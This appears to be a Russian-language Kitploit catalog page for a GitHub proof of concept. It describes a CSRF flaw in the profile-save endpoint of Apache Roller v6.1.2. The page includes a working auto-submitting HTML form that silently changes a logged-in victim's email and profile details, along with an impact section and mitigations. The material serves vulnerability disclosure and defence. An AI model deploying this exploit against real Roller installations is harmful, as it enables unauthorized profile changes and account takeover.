Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
roller-csrf | Kitploit
Инструменты/GitHubGitHub/vanlam2001/roller-csrf
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubvanlam2001/roller-csrf

roller-csrf

Репозиторий
9 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Apache Roller v6.1.2 - Межсайтовая подделка запросов (CSRF) при обновлении профиля

Детали уязвимости

  • Версия: v6.1.2
  • Дата: 2025-11-09
  • Автор эксплойта: Van Lam Nguyen
  • Facebook: https://www.facebook.com/vanlam1412
  • Домашняя страница производителя: https://roller.apache.org
  • Ссылка на ПО: https://github.com/apache/roller/archive/refs/tags/roller-6.1.2.zip
  • Протестировано на: Windows
  • CVE: N/A
  • Демо: https://youtu.be/iPEiVzcpJJU

Обзор

В Roller v6.1.2 и более ранних версиях обнаружена уязвимость межсайтовой подделки запросов (CSRF) в конечной точке /roller/roller-ui/profile!save.rol.

Данная уязвимость позволяет злоумышленникам произвольно изменять информацию профиля пользователя-жертвы (например, адрес электронной почты, полное имя, локаль, часовой пояс) с помощью специально созданной HTML-страницы.

Подтверждение концепции

Уязвимость позволяет отправлять несанкционированные запросы к /roller/roller-ui/profile!save.rol, которые обновляют профиль пользователя без защиты CSRF.

HTML-код эксплойта

root@kitploit:~
<html>
<head>
    <form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
        <input name="bean.userName" value="vanlam" type="hidden">
        <input name="bean.screenName" value="hacked" type="hidden">
        <input name="bean.fullName" value="hacked" type="hidden">
        <input name="bean.emailAddress" value="[email protected]" type="hidden">
        <input name="bean.passwordText" value="" type="hidden">
        <input name="bean.passwordConfirm" value="" type="hidden">
        <input name="bean.locale" value="vi_VN" type="hidden">
        <input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
    </form>

    <script>
        document.getElementById('exploitForm').submit();
    </script>
</head>
</html>

Параметры формы

  • bean.userName: vanlam
  • bean.screenName: hacked
  • bean.fullName: hacked
  • bean.emailAddress: [email protected]
  • bean.passwordText: (пусто)
  • bean.passwordConfirm: (пусто)
  • bean.locale: vi_VN
  • bean.timeZone: Asia/Bangkok

Воздействие

Злоумышленник может создать вредоносную HTML-страницу, которая при посещении аутентифицированным пользователем Roller автоматически отправит форму для обновления информации профиля жертвы без её согласия. Это может привести к:

  • Несанкционированному изменению данных профиля пользователя
  • Возможному захвату учётной записи при изменении адреса электронной почты
  • Нарушению пользовательского опыта из-за изменения локали и часового пояса

Устранение

  • Внедрить CSRF-токены для всех запросов, изменяющих состояние
  • Проверять заголовки Origin и Referer
  • Использовать файлы cookie с атрибутом SameSite
  • Реализовать надлежащие проверки подлинности и авторизации
Скачать инструмент